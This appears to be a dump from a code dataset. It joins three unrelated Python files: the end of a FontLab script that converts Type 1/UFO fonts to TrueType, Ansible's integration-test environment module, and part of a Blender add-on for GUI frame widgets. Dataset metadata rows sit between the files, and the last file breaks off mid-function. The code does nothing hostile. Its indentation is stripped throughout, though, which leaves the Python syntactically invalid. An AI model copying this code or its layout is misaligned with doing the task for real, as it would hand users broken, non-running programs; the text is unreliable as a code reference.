# Add the FDK path to the env variable (on Mac only) so
# that command line tools can be called from FontLab
if MAC:
fdkPathMac = os.sep.join((
userFolder, 'bin', 'FDK', 'tools', 'osx'))
envPath = os.environ["PATH"]
newPathString = envPath + ":" + fdkPathMac
if fdkPathMac not in envPath:
os.environ["PATH"] = newPathString
if PC:
from subprocess import Popen, PIPE
# ----------------------------------------------------------------------------------------
# Import the FDK-embedded fontTools
if MAC:
osFolderName = "osx"
if PC:
osFolderName = "win"
fontToolsPath = os.sep.join((
userFolder, 'bin', 'FDK', 'Tools',
osFolderName, 'Python', 'AFDKOPython27', 'lib',
'python2.7', 'site-packages', 'FontTools'))
if fontToolsPath not in sys.path:
sys.path.append(fontToolsPath)
try:
from fontTools import ttLib
except ImportError:
print "\nERROR: FontTools Python module is not installed.\nGet the latest version at https://github.com/behdad/fonttools"
errorHappened = True
# ----------------------------------------------------------------------------------------
# constants:
kPPMsFileName = "ppms"
kTTHintsFileName = "tthints"
kGOADBfileName = "GlyphOrderAndAliasDB"
kTempEncFileName = ".tempEncoding"
kFontTXT = "font.txt"
kFontUFO = "font.ufo"
kFontTTF = "font.ttf"
flPrefs = Options()
flPrefs.Load()
def readFile(filePath):
file = open(filePath, 'r')
fileContent = file.read().splitlines()
file.close()
return fileContent
def writeFile(contentList, filePath):
outfile = open(filePath, 'w')
outfile.writelines(contentList)
outfile.close()
def getFontPaths(path):
fontsList = []
for root, folders, files in os.walk(path):
fileAndFolderList = folders[:]
fileAndFolderList.extend(files)
pfaRE = re.compile(r'(^.+?\.pfa)$', re.IGNORECASE)
ufoRE = re.compile(r'(^.+?\.ufo)$', re.IGNORECASE)
txtRE = re.compile(r'^font.txt$', re.IGNORECASE)
pfaFiles = [
match.group(1) for item in fileAndFolderList
for match in [pfaRE.match(item)] if match]
ufoFiles = [
match.group(1) for item in fileAndFolderList
for match in [ufoRE.match(item)] if match]
txtFiles = [
match.group(0) for item in fileAndFolderList
for match in [txtRE.match(item)] if match]
# Prioritizing the list of source files, so that only one of them is
# found and converted; in case there are multiple possible files in
# a single folder. Order of priority is PFA - UFO - TXT.
allFontsFound = pfaFiles + ufoFiles + txtFiles
if len(allFontsFound):
item = allFontsFound[0]
fontsList.append(os.path.join(root, item))
else:
continue
return fontsList
def getGOADB2ndColumn(goadbList):
'Get the second column of the original GOADB file and return it as a list.'
resultList = []
lineNum = 1
skippedLines = 0
re_match1stCol = re.compile(r"(\S+)\t(\S+)(\t\S+)?")
for line in goadbList:
# allow for comments:
line = line.split('#')[0]
# Skip over blank lines
stripline = line.strip()
if not stripline:
skippedLines += 1
continue
result = re_match1stCol.match(line)
if result: # the result can be None
resultList.append(result.group(2) + '\n')
else: # nothing matched
print "Problem matching line %d (current GOADB)" % lineNum
lineNum += 1
if (len(goadbList) != (len(resultList) + skippedLines)):
print "ERROR: There was a problem processing the current GOADB file"
return None
else:
return resultList
def makeTempEncFileFromGOADB(goadbPath):
goadbFileContent = readFile(goadbPath)
goadb2ndColumnList = getGOADB2ndColumn(goadbFileContent)
if not goadb2ndColumnList:
return None
encPath = os.path.join(os.path.dirname(goadbPath), kTempEncFileName)
writeFile(goadb2ndColumnList, encPath)
return encPath
def readPPMsFile(filePath):
lines = readFile(filePath)
hPPMsList = []
vPPMsList = []
for i in range(len(lines)):
line = lines[i]
# Skip over blank lines
stripline = line.strip()
if not stripline:
continue
# Get rid of all comments
if line.find('#') >= 0:
continue
else:
if "X:" in line:
vPPMsList.append(line)
else:
hPPMsList.append(line)
return hPPMsList, vPPMsList
def replaceStemsAndPPMs(hPPMsList, vPPMsList):
if len(hPPMsList) != len(fl.font.ttinfo.hstem_data):
print "\tERROR: The amount of H stems does not match"
return
if len(vPPMsList) != len(fl.font.ttinfo.vstem_data):
print "\tERROR: The amount of V stems does not match"
return
for i in range(len(fl.font.ttinfo.hstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = hPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.hstem_data[i] = stem
for i in range(len(fl.font.ttinfo.vstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = vPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.vstem_data[i] = stem
def processZonesArray(inArray):
outArray = []
for x in range(len(inArray)/2):
if inArray[x * 2] < 0:
outArray.append(inArray[x * 2])
outArray.append(inArray[x * 2 + 1])
outArray.sort()
return outArray
def removeBottomZonesAboveBaseline():
baselineZonesWereRemoved = False
# this is a single master font, so only the
# first array will have non-zero values:
newOtherBluesArray = processZonesArray(fl.font.other_blues[0])
if (fl.font.other_blues_num != len(newOtherBluesArray)):
# trim the number of zones
fl.font.other_blues_num = len(newOtherBluesArray)
for x in range(len(newOtherBluesArray)):
fl.font.other_blues[0][x] = newOtherBluesArray[x]
baselineZonesWereRemoved = True
newFamilyOtherBluesArray = processZonesArray(fl.font.family_other_blues[0])
if (fl.font.family_other_blues_num != len(newFamilyOtherBluesArray)):
# trim the number of zones
fl.font.family_other_blues_num = len(newFamilyOtherBluesArray)
for x in range(len(newFamilyOtherBluesArray)):
fl.font.family_other_blues[0][x] = newFamilyOtherBluesArray[x]
baselineZonesWereRemoved = True
return baselineZonesWereRemoved
def replaceFontZonesByFamilyZones():
"""
The font's zones are replaced by the family zones to make sure that all
the styles have the same vertical height at all ppems. If the font doesn't
have family zones (e.g. Regular style), don't do anything.
"""
fontZonesWereReplaced = False
# TOP zones
if len(fl.font.family_blues[0]):
if fl.font.family_blues_num == 14 and fl.font.blue_values_num < fl.font.family_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's TOP zones cannot be replaced by the family TOP zones"
print
return fontZonesWereReplaced
elif fl.font.family_blues_num == 14 and fl.font.blue_values_num == fl.font.family_blues_num:
pass
else:
fl.font.blue_values_num = fl.font.family_blues_num
# This will create a traceback if there are 7 top zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_blues[0])):
fl.font.blue_values[0][x] = fl.font.family_blues[0][x]
print "WARNING: The font's TOP zones were replaced by the family TOP zones."
fontZonesWereReplaced = True
# BOTTOM zones
if len(fl.font.family_other_blues[0]):
if fl.font.family_other_blues_num == 10 and fl.font.other_blues_num < fl.font.family_other_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's BOTTOM zones cannot be replaced by the family BOTTOM zones"
print
return fontZonesWereReplaced
elif fl.font.family_other_blues_num == 10 and fl.font.other_blues_num == fl.font.family_other_blues_num:
pass
else:
fl.font.other_blues_num = fl.font.family_other_blues_num
# This will create a traceback if there are 5 bottom zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_other_blues[0])):
fl.font.other_blues[0][x] = fl.font.family_other_blues[0][x]
print "WARNING: The font's BOTTOM zones were replaced by the family BOTTOM zones."
fontZonesWereReplaced = True
return fontZonesWereReplaced
def convertT1toTT():
'''
Converts an open FL font object from PS to TT outlines, using on-board
FontLab commands. The outlines are post-processed to reset starting points
to their original position.
'''
for g in fl.font.glyphs:
# Keeping track of original start point coordinates:
startPointCoords = [
(point.x, point.y) for point in g.nodes if point.type == 17]
# fl.TransformGlyph(g, 5, "0001") # Remove Horizontal Hints
# fl.TransformGlyph(g, 5, "0003") # Remove Horizontal & Vertical Hints
fl.TransformGlyph(g, 5, "0002") # Remove Vertical Hints
fl.TransformGlyph(g, 13, "") # Curves to TrueType
fl.TransformGlyph(g, 14, "0001") # Contour direction [TT]
# The start points might move when FL reverses the contour.
# This dictionary keeps track of the new coordinates.
newCoordDict = {
(node.x, node.y): index for index, node in enumerate(g.nodes)}
# Going through all start points backwards, and re-setting them
# to original position.
for pointCoords in startPointCoords[::-1]:
g.SetStartNode(newCoordDict[pointCoords])
fl.TransformGlyph(g, 7, "") # Convert PS hints to TT instructions.
def changeTTfontSettings():
# Clear `gasp` array:
if len(fl.font.ttinfo.gasp):
del fl.font.ttinfo.gasp[0]
# Create `gasp` element:
gaspElement = TTGasp(65535, 2)
# Range: 65535=0...
# Options: 0=None
# 1=Instructions
# 2=Smoothing
# 3=Instructions+Smoothing
# Add element to `gasp` array
fl.font.ttinfo.gasp[0] = gaspElement
# Clear `hdmx` array
for i in range(len(fl.font.ttinfo.hdmx)):
try:
del fl.font.ttinfo.hdmx[0]
except:
continue
# Uncheck "Create [vdmx] table", also
# uncheck "Automatically add .null, CR and space characters"
fl.font.ttinfo.head_flags = 0
def setType1openPrefs():
flPrefs.T1Decompose = 1 # checked - Decompose all composite glyphs
flPrefs.T1Unicode = 0 # unchecked - Generate Unicode indexes for all glyphs
flPrefs.OTGenerate = 0 # unchecked - Generate basic OpenType features for Type 1 fonts with Standard encoding
flPrefs.T1MatchEncoding = 0 # unchecked - Find matching encoding table if possible
def setTTgeneratePrefs():
flPrefs.TTENoReorder = 1 # unchecked - Automatically reorder glyphs
flPrefs.TTEFontNames = 1 # option - Do not export OpenType name records
flPrefs.TTESmartMacNames = 0 # unchecked - Use the OpenType names as menu names on Macintosh
flPrefs.TTEStoreTables = 0 # unchecked - Write stored custom TrueType/OpenType tables
flPrefs.TTEExportOT = 0 # unchecked - Export OpenType layout tables
flPrefs.DSIG_Use = 0 # unchecked - Generate digital signature (DSIG table)
flPrefs.TTEHint = 1 # checked - Export hinted TrueType fonts
flPrefs.TTEKeep = 1 # checked - Write stored TrueType native hinting
flPrefs.TTEVisual = 1 # checked - Export visual TrueType hints
flPrefs.TTEAutohint = 0 # unchecked - Autohint unhinted glyphs
flPrefs.TTEWriteBitmaps = 0 # unchecked - Export embedded bitmaps
flPrefs.CopyHDMXData = 0 # unchecked - Copy HDMX data from base to composite glyph
flPrefs.OTWriteMort = 0 # unchecked - Export "mort" table if possible
flPrefs.TTEVersionOS2 = 3 # option - OS/2 table version 3
flPrefs.TTEWriteKernTable = 0 # unchecked - Export old-style non-OpenType "kern" table
flPrefs.TTEWriteKernFeature = 0 # unchecked - Generate OpenType "kern" feature if it is undefined or outdated
flPrefs.TTECmap10 = 1 # option - Use following codepage to build cmap(1,0) table:
# [Current codepage in the Font Window]
flPrefs.TTEExportUnicode = 0 # checked - Ignore Unicode indexes in the font
# option - Use following codepage for first 256 glyphs:
# Do not reencode first 256 glyphs
# unchecked - Export only first 256 glyphs of the selected codepage
# unchecked - Put MS Char Set value into fsSelection field
def setTTautohintPrefs():
# The single link attachment precision is 7 in all cases
# flPrefs.TTHHintingOptions = 16135 # All options checked
# flPrefs.TTHHintingOptions = 7 # All options unchecked
flPrefs.TTHHintingOptions = 2055 # Cusps option checked
def postProccessTTF(fontFilePath):
'''
Post-process TTF font as generated by FontLab:
- change FontLab-generated glyph name 'nonmarkingspace' to 'nbspace'
- edit `prep` table to stop hints being active at 96 ppm and above.
'''
print "Post-processing font.ttf file..."
font = ttLib.TTFont(fontFilePath)
glyphOrder = font.getGlyphOrder()
postTable = font['post']
if 'prep' in font.keys():
prepTable = font['prep']
else:
prepTable = None
glyfTable = font['glyf']
hmtxTable = font['hmtx']
# Change name of 'nonbreakingspace' to 'nbspace' in GlyphOrder
# and glyf table and add it to post table
if "nonbreakingspace" in glyphOrder:
# updateGlyphOrder = True
glyphOrder[glyphOrder.index("nonbreakingspace")] = "nbspace"
font.setGlyphOrder(glyphOrder)
glyfTable.glyphs["nbspace"] = glyfTable.glyphs["nonbreakingspace"]
del glyfTable.glyphs["nonbreakingspace"]
hmtxTable.metrics["nbspace"] = hmtxTable.metrics["nonbreakingspace"]
del hmtxTable.metrics["nonbreakingspace"]
postTable.extraNames.append("nbspace")
# Delete NULL and CR
for gName in ["NULL", "nonmarkingreturn"]:
if gName in glyphOrder:
del glyphOrder[glyphOrder.index(gName)]
font.setGlyphOrder(glyphOrder)
del glyfTable.glyphs[gName]
del hmtxTable.metrics[gName]
if gName in postTable.extraNames:
del postTable.extraNames[postTable.extraNames.index(gName)]
# Extend the prep table
# If the last byte is
# WCVTP[ ] /* WriteCVTInPixels */
# add these extra bytes
# MPPEM[ ] /* MeasurePixelPerEm */
# PUSHW[ ] /* 1 value pushed */
# 96
# GT[ ] /* GreaterThan */
# IF[ ] /* If */
# PUSHB[ ] /* 1 value pushed */
# 1
# ELSE[ ] /* Else */
# PUSHB[ ] /* 1 value pushed */
# 0
# EIF[ ] /* EndIf */
# PUSHB[ ] /* 1 value pushed */
# 1
# INSTCTRL[ ] /* SetInstrExecControl */
if prepTable:
if prepTable.program.bytecode[-1] == 68:
prepTable.program.bytecode.extend(
[75, 184, 0, 96, 82, 88, 176, 1, 27, 176, 0, 89, 176, 1, 142])
# Save the changes
folderPath, fontFileName = os.path.split(fontFilePath)
newFontFilePath = os.path.join(folderPath, "%s%s" % ('_', fontFileName))
font.save(newFontFilePath)
font.close()
os.remove(fontFilePath)
os.rename(newFontFilePath, fontFilePath)
def convertTXTfontToPFA(txtPath):
tempPFApath = txtPath.replace('.txt', '_TEMP_.pfa')
command = 'type1 "%s" > "%s"' % (txtPath, tempPFApath)
# Run type1 tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def convertUFOfontToPFA(ufoPath):
tempPFApath = ufoPath.replace('.ufo', '_TEMP_.pfa')
command = 'tx -t1 "%s" > "%s"' % (ufoPath, tempPFApath)
# Run tx tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def processFonts(fontsList):
totalFonts = len(fontsList)
print "%d fonts found:\n%s\n" % (totalFonts, '\n'.join(fontsList))
setType1openPrefs()
setTTgeneratePrefs()
setTTautohintPrefs()
fontIndex = 1
for pfaPath in fontsList:
# Make temporary encoding file from GOADB file. This step needs to
# be done per font, because the directory tree selected may contain
# more than one family, or because the glyph set of a given family
# may not be the same for both Roman/Upright and Italic/Sloped.
encPath = None
goadbPath = None
# The GOADB can be located in the same folder or up to two
# levels above in the directory tree
sameLevel = os.path.join(os.path.dirname(pfaPath), kGOADBfileName)
oneUp = os.path.join(
os.path.dirname(os.path.dirname(pfaPath)), kGOADBfileName)
twoUp = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(pfaPath))), kGOADBfileName)
if os.path.exists(sameLevel):
goadbPath = sameLevel
elif os.path.exists(oneUp):
goadbPath = oneUp
elif os.path.exists(twoUp):
goadbPath = twoUp
if goadbPath:
encPath = makeTempEncFileFromGOADB(goadbPath)
else:
print "Could not find %s file." % kGOADBfileName
print "Skipping %s" % pfaPath
print
if not encPath:
continue
# Checking if a derivedchars file exists.
# If not, the dvInput step is skipped.
makeDV = False
for file in os.listdir(os.path.split(pfaPath)[0]):
if re.search(r'derivedchars(.+?)?$', file) and dvModuleFound:
makeDV = True
fontIsTXT = False
fontIsUFO = False
if kFontTXT in pfaPath:
fontIsTXT = True
pfaPath = convertTXTfontToPFA(pfaPath)
elif kFontUFO in pfaPath or (pfaPath[-4:].lower() in [".ufo"]):
# Support more than just files named "font.ufo"
fontIsUFO = True
pfaPath = convertUFOfontToPFA(pfaPath)
fl.Open(pfaPath)
print "\nProcessing %s ... (%d/%d)" % (
fl.font.font_name, fontIndex, totalFonts)
fontIndex += 1
fontZonesWereReplaced = replaceFontZonesByFamilyZones()
baselineZonesWereRemoved = removeBottomZonesAboveBaseline()
# NOTE: After making changes to the PostScript alignment zones, the TT
# equivalents have to be updated as well, but I couldn't find a way
# to do it via scripting (because TTH.top_zones and TTH.bottom_zones
# are read-only, and despite that functionality being available in
# the UI, there's no native function to update TT zones from T1 zones).
# So the solution is to generate a new T1 font and open it back.
pfaPathTemp = pfaPath.replace('.pfa', '_TEMP_.pfa')
infPathTemp = pfaPathTemp.replace('.pfa', '.inf')
if baselineZonesWereRemoved or fontZonesWereReplaced:
fl.GenerateFont(eval("ftTYPE1ASCII"), pfaPathTemp)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
fl.Open(pfaPathTemp)
if os.path.exists(infPathTemp):
# Delete the .INF file (bug in FL v5.1.x)
os.remove(infPathTemp)
# Load encoding file
fl.font.encoding.Load(encPath)
# Make sure the Font window is in 'Names mode'
fl.CallCommand(fl_cmd.FontModeNames)
# Sort glyphs by encoding
fl.CallCommand(fl_cmd.FontSortByCodepage)
# read derivedchars file, make components
if makeDV:
dvInput_module.run(verbose=False)
convertT1toTT()
changeTTfontSettings()
# Switch the Font window to 'Index mode'
fl.CallCommand(fl_cmd.FontModeIndex)
# path to the folder containing the font, and the font's file name
folderPath, fontFileName = os.path.split(pfaPath)
ppmsFilePath = os.path.join(folderPath, kPPMsFileName)
if os.path.exists(ppmsFilePath):
hPPMs, vPPMs = readPPMsFile(ppmsFilePath)
replaceStemsAndPPMs(hPPMs, vPPMs)
tthintsFilePath = os.path.join(folderPath, kTTHintsFileName)
if os.path.exists(tthintsFilePath):
inputTTHints.run(folderPath)
# readTTHintsFile(tthintsFilePath)
# replaceTTHints()
# FontLab 5.1.5 Mac Build 5714 does NOT respect the unchecked
# option "Automatically add .null, CR and space characters"
for gName in ["NULL", "CR"]:
gIndex = fl.font.FindGlyph(gName)
if gIndex != -1:
del fl.font.glyphs[gIndex]
vfbPath = pfaPath.replace('.pfa', '.vfb')
fl.Save(vfbPath)
# The filename of the TT output is hardcoded
ttfPath = os.path.join(folderPath, kFontTTF)
fl.GenerateFont(eval("ftTRUETYPE"), ttfPath)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
# The TT font generated with FontLab ends up with a few glyph names
# changed. Fix the glyph names so that makeOTF does not fail.
postProccessTTF(ttfPath)
# Delete temporary Encoding file:
if os.path.exists(encPath):
os.remove(encPath)
# Delete temp PFA:
if os.path.exists(pfaPathTemp):
os.remove(pfaPathTemp)
# Cleanup after processing from TXT type1 font or UFO font
if fontIsTXT or fontIsUFO:
if os.path.exists(pfaPath):
os.remove(pfaPath)
if os.path.exists(ttfPath):
finalTTFpath = ttfPath.replace('_TEMP_.ttf', '.ttf')
if finalTTFpath != ttfPath:
if PC:
os.remove(finalTTFpath)
os.rename(ttfPath, finalTTFpath)
if os.path.exists(vfbPath):
finalVFBpath = vfbPath.replace('_TEMP_.vfb', '.vfb')
if finalVFBpath != vfbPath:
if PC and os.path.exists(finalVFBpath):
os.remove(finalVFBpath)
os.rename(vfbPath, finalVFBpath)
# remove FontLab leftovers
pfmPath = pfaPathTemp.replace('.pfa', '.pfm')
afmPath = pfaPathTemp.replace('.pfa', '.afm')
if os.path.exists(pfmPath):
os.remove(pfmPath)
if os.path.exists(afmPath):
os.remove(afmPath)
def run():
# Get folder to process
baseFolderPath = fl.GetPathName("Select font family directory")
if not baseFolderPath: # Cancel was clicked or ESC key was pressed
return
startTime = time.time()
fontsList = getFontPaths(baseFolderPath)
if len(fontsList):
processFonts(fontsList)
else:
print "No fonts found"
endTime = time.time()
elapsedSeconds = endTime-startTime
if (elapsedSeconds/60) < 1:
print '\nCompleted in %.1f seconds.\n' % elapsedSeconds
else:
print '\nCompleted in %d minutes and %d seconds.\n' % (
elapsedSeconds/60, elapsedSeconds%60)
if __name__ == "__main__":
if not errorHappened:
run()
| mit | -4,984,340,435,244,985,000 | 34.212637 | 131 | 0.621636 | false |
ujenmr/ansible | test/runner/lib/integration/__init__.py | 1 | 7973 | """Ansible integration test infrastructure."""
from __future__ import absolute_import, print_function
import contextlib
import json
import os
import shutil
import tempfile
from lib.target import (
analyze_integration_target_dependencies,
walk_integration_targets,
)
from lib.config import (
NetworkIntegrationConfig,
PosixIntegrationConfig,
WindowsIntegrationConfig,
)
from lib.util import (
ApplicationError,
display,
make_dirs,
named_temporary_file,
)
from lib.cache import (
CommonCache,
)
from lib.cloud import (
CloudEnvironmentConfig,
)
def generate_dependency_map(integration_targets):
"""
:type integration_targets: list[IntegrationTarget]
:rtype: dict[str, set[IntegrationTarget]]
"""
targets_dict = dict((target.name, target) for target in integration_targets)
target_dependencies = analyze_integration_target_dependencies(integration_targets)
dependency_map = {}
invalid_targets = set()
for dependency, dependents in target_dependencies.items():
dependency_target = targets_dict.get(dependency)
if not dependency_target:
invalid_targets.add(dependency)
continue
for dependent in dependents:
if dependent not in dependency_map:
dependency_map[dependent] = set()
dependency_map[dependent].add(dependency_target)
if invalid_targets:
raise ApplicationError('Non-existent target dependencies: %s' % ', '.join(sorted(invalid_targets)))
return dependency_map
def get_files_needed(target_dependencies):
"""
:type target_dependencies: list[IntegrationTarget]
:rtype: list[str]
"""
files_needed = []
for target_dependency in target_dependencies:
files_needed += target_dependency.needs_file
files_needed = sorted(set(files_needed))
invalid_paths = [path for path in files_needed if not os.path.isfile(path)]
if invalid_paths:
raise ApplicationError('Invalid "needs/file/*" aliases:\n%s' % '\n'.join(invalid_paths))
return files_needed
@contextlib.contextmanager
def integration_test_environment(args, target, inventory_path):
"""
:type args: IntegrationConfig
:type target: IntegrationTarget
:type inventory_path: str
"""
vars_file = 'integration_config.yml'
if args.no_temp_workdir or 'no/temp_workdir/' in target.aliases:
display.warning('Disabling the temp work dir is a temporary debugging feature that may be removed in the future without notice.')
integration_dir = 'test/integration'
ansible_config = os.path.join(integration_dir, '%s.cfg' % args.command)
inventory_name = os.path.relpath(inventory_path, integration_dir)
if '/' in inventory_name:
inventory_name = inventory_path
yield IntegrationEnvironment(integration_dir, inventory_name, ansible_config, vars_file)
return
root_temp_dir = os.path.expanduser('~/.ansible/test/tmp')
prefix = '%s-' % target.name
suffix = u'-\u00c5\u00d1\u015a\u00cc\u03b2\u0141\u00c8'
if args.no_temp_unicode or 'no/temp_unicode/' in target.aliases:
display.warning('Disabling unicode in the temp work dir is a temporary debugging feature that may be removed in the future without notice.')
suffix = '-ansible'
if isinstance('', bytes):
suffix = suffix.encode('utf-8')
if args.explain:
temp_dir = os.path.join(root_temp_dir, '%stemp%s' % (prefix, suffix))
else:
make_dirs(root_temp_dir)
temp_dir = tempfile.mkdtemp(prefix=prefix, suffix=suffix, dir=root_temp_dir)
try:
display.info('Preparing temporary directory: %s' % temp_dir, verbosity=2)
inventory_names = {
PosixIntegrationConfig: 'inventory',
WindowsIntegrationConfig: 'inventory.winrm',
NetworkIntegrationConfig: 'inventory.networking',
}
inventory_name = inventory_names[type(args)]
cache = IntegrationCache(args)
target_dependencies = sorted([target] + list(cache.dependency_map.get(target.name, set())))
files_needed = get_files_needed(target_dependencies)
integration_dir = os.path.join(temp_dir, 'test/integration')
ansible_config = os.path.join(integration_dir, '%s.cfg' % args.command)
file_copies = [
('test/integration/%s.cfg' % args.command, ansible_config),
('test/integration/integration_config.yml', os.path.join(integration_dir, vars_file)),
(inventory_path, os.path.join(integration_dir, inventory_name)),
]
file_copies += [(path, os.path.join(temp_dir, path)) for path in files_needed]
directory_copies = [
(os.path.join('test/integration/targets', target.name), os.path.join(integration_dir, 'targets', target.name)) for target in target_dependencies
]
inventory_dir = os.path.dirname(inventory_path)
host_vars_dir = os.path.join(inventory_dir, 'host_vars')
group_vars_dir = os.path.join(inventory_dir, 'group_vars')
if os.path.isdir(host_vars_dir):
directory_copies.append((host_vars_dir, os.path.join(integration_dir, os.path.basename(host_vars_dir))))
if os.path.isdir(group_vars_dir):
directory_copies.append((group_vars_dir, os.path.join(integration_dir, os.path.basename(group_vars_dir))))
directory_copies = sorted(set(directory_copies))
file_copies = sorted(set(file_copies))
if not args.explain:
make_dirs(integration_dir)
for dir_src, dir_dst in directory_copies:
display.info('Copying %s/ to %s/' % (dir_src, dir_dst), verbosity=2)
if not args.explain:
shutil.copytree(dir_src, dir_dst, symlinks=True)
for file_src, file_dst in file_copies:
display.info('Copying %s to %s' % (file_src, file_dst), verbosity=2)
if not args.explain:
make_dirs(os.path.dirname(file_dst))
shutil.copy2(file_src, file_dst)
yield IntegrationEnvironment(integration_dir, inventory_name, ansible_config, vars_file)
finally:
if not args.explain:
shutil.rmtree(temp_dir)
@contextlib.contextmanager
def integration_test_config_file(args, env_config, integration_dir):
"""
:type args: IntegrationConfig
:type env_config: CloudEnvironmentConfig
:type integration_dir: str
"""
if not env_config:
yield None
return
config_vars = (env_config.ansible_vars or {}).copy()
config_vars.update(dict(
ansible_test=dict(
environment=env_config.env_vars,
module_defaults=env_config.module_defaults,
)
))
config_file = json.dumps(config_vars, indent=4, sort_keys=True)
with named_temporary_file(args, 'config-file-', '.json', integration_dir, config_file) as path:
filename = os.path.relpath(path, integration_dir)
display.info('>>> Config File: %s\n%s' % (filename, config_file), verbosity=3)
yield path
class IntegrationEnvironment(object):
"""Details about the integration environment."""
def __init__(self, integration_dir, inventory_path, ansible_config, vars_file):
self.integration_dir = integration_dir
self.inventory_path = inventory_path
self.ansible_config = ansible_config
self.vars_file = vars_file
class IntegrationCache(CommonCache):
"""Integration cache."""
@property
def integration_targets(self):
"""
:rtype: list[IntegrationTarget]
"""
return self.get('integration_targets', lambda: list(walk_integration_targets()))
@property
def dependency_map(self):
"""
:rtype: dict[str, set[IntegrationTarget]]
"""
return self.get('dependency_map', lambda: generate_dependency_map(self.integration_targets))
| gpl-3.0 | 6,827,618,228,914,543,000 | 30.892 | 156 | 0.654835 | false |
RetroView/hecl | blender/hecl/frme.py | 3 | 21197 | import bpy, struct, math
from mathutils import Quaternion
def draw(layout, context):
if bpy.context.active_object:
obj = bpy.context.active_object
layout.label(text="Widget Settings:", icon='OBJECT_DATA')
layout.prop_menu_enum(obj, 'retro_widget_type', text='Widget Type')
#layout.prop_search(obj, 'retro_widget_parent', context.scene, 'objects', text='Widget Parent')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_default_visible', text='Visible')
row.prop(obj, 'retro_widget_default_active', text='Active')
row.prop(obj, 'retro_widget_cull_faces', text='Cull Faces')
layout.prop(obj, 'retro_widget_color', text='Color')
layout.prop_menu_enum(obj, 'retro_widget_model_draw_flags', text='Draw Flags')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_is_worker', text='Is Worker')
if obj.retro_widget_is_worker:
row.prop(obj, 'retro_widget_worker_id', text='Worker Id')
if obj.retro_widget_type == 'RETRO_MODL':
layout.prop(obj, 'retro_model_light_mask', text='Light Mask')
elif obj.retro_widget_type == 'RETRO_PANE':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
elif obj.retro_widget_type == 'RETRO_TXPN':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
layout.prop(obj, 'retro_textpane_font_path', text='Font Path')
row = layout.row(align=True)
row.prop(obj, 'retro_textpane_word_wrap', text='Word Wrap')
row.prop(obj, 'retro_textpane_horizontal', text='Horizontal')
layout.prop(obj, 'retro_textpane_fill_color', text='Fill Color')
layout.prop(obj, 'retro_textpane_outline_color', text='Outline Color')
layout.prop(obj, 'retro_textpane_block_extent', text='Point Dimensions')
layout.prop(obj, 'retro_textpane_jp_font_path', text='JP Font Path')
layout.prop(obj, 'retro_textpane_jp_font_scale', text='JP Point Dimensions')
layout.prop_menu_enum(obj, 'retro_textpane_hjustification', text='Horizontal Justification')
layout.prop_menu_enum(obj, 'retro_textpane_vjustification', text='Vertical Justification')
elif obj.retro_widget_type == 'RETRO_TBGP':
layout.prop(obj, 'retro_tablegroup_elem_count', text='Element Count')
layout.prop(obj, 'retro_tablegroup_elem_default', text='Default Element')
layout.prop(obj, 'retro_tablegroup_wraparound', text='Wraparound')
elif obj.retro_widget_type == 'RETRO_GRUP':
layout.prop(obj, 'retro_group_default_worker', text='Default Worker')
elif obj.retro_widget_type == 'RETRO_SLGP':
row = layout.row(align=True)
row.prop(obj, 'retro_slider_min', text='Min')
row.prop(obj, 'retro_slider_max', text='Max')
layout.prop(obj, 'retro_slider_default', text='Default')
layout.prop(obj, 'retro_slider_increment', text='Increment')
elif obj.retro_widget_type == 'RETRO_ENRG':
layout.prop(obj, 'retro_energybar_texture_path', text='Energy Bar Texture Path')
elif obj.retro_widget_type == 'RETRO_METR':
layout.prop(obj, 'retro_meter_no_round_up', text='No Round Up')
layout.prop(obj, 'retro_meter_max_capacity', text='Max Capacity')
layout.prop(obj, 'retro_meter_worker_count', text='Worker Count')
elif obj.retro_widget_type == 'RETRO_LITE':
if obj.data and obj.type == 'LIGHT':
layout.prop(obj.data, 'retro_light_index', text='Index')
layout.label(text="Angular Falloff:", icon='LIGHT')
row = layout.row(align=True)
row.prop(obj.data, 'retro_light_angle_constant', text='Constant')
row.prop(obj.data, 'retro_light_angle_linear', text='Linear')
row.prop(obj.data, 'retro_light_angle_quadratic', text='Quadratic')
hjustifications = None
vjustifications = None
model_draw_flags_e = None
def recursive_cook(buffer, obj, version, path_hasher, parent_name):
buffer += struct.pack('>4s', obj.retro_widget_type[6:].encode())
buffer += obj.name.encode() + b'\0'
buffer += parent_name.encode() + b'\0'
buffer += struct.pack('>bbbbffffI',
False,
obj.retro_widget_default_visible,
obj.retro_widget_default_active,
obj.retro_widget_cull_faces,
obj.retro_widget_color[0],
obj.retro_widget_color[1],
obj.retro_widget_color[2],
obj.retro_widget_color[3],
model_draw_flags_e[obj.retro_widget_model_draw_flags])
angle = Quaternion((1.0, 0.0, 0.0), 0)
if obj.retro_widget_type == 'RETRO_CAMR':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
